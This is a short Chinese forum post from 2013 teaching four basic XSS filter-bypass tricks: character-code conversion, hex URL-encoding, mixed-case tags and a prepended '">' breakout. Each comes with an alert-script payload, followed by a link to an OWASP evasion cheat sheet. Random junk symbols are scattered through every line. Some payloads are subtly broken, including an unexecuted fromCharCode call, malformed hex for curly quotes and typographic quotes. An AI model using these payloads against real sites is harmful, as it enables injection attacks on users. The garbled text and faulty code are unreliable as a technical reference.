四种超级基础的绕过方法。
2 K/ C; f: b9 a6 Y) P1.转换为ASCII码
: v9 z# n& t, G, o* m6 Y( H( M例子:原脚本为<script>alert(‘I love F4ck’)</script >- Y# `# i2 x3 v# x" Z" S
通过转换,变成:
, B: V% \: l+ K% N6 Z0 P<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
& O( g- {; ?; `# s( N
* W1 v- `' A1 ?) F1 K* z9 e3 c% j2.转换为HEX(十六进制)
. r# U; ~% _/ d7 E1 j例子:原脚本为<script>alert(‘I love F4ck’)</script>
* w" t. y: B+ I( H H) F6 g. y) n通过转换,变成:
1 _/ h$ j$ P/ ?4 C6 k; H6 R- W%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
) `$ d! T" F* \2 M / ^" [& z' k6 @% C1 R: p+ |3 T! S& o. v
3.转换脚本的大小写
6 F8 V; U" x5 j例子:原脚本为<script>alert(‘I love F4ck’)</script>4 I5 |5 o9 ?9 E) W
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>: J' V. m. h$ f( z9 U0 Y
0 y! w5 B/ k( a4.增加闭合标记”>
/ E7 p0 Z' s3 s" V. s2 w例子:原脚本为<script>alert(‘I love F4ck’)</script>( D, R, M! i, i4 Y( [( f
转换为:”><script>alert(‘I love F4ck’)</script>$ g$ X5 j- V8 ~- v# K. b- @# f
更详细绕过技术请参考此网页1 J9 Z1 u2 o" [0 K; p
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
4 v- D% X, u3 P" ~0 { 3 ~+ W. c5 O# _
转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对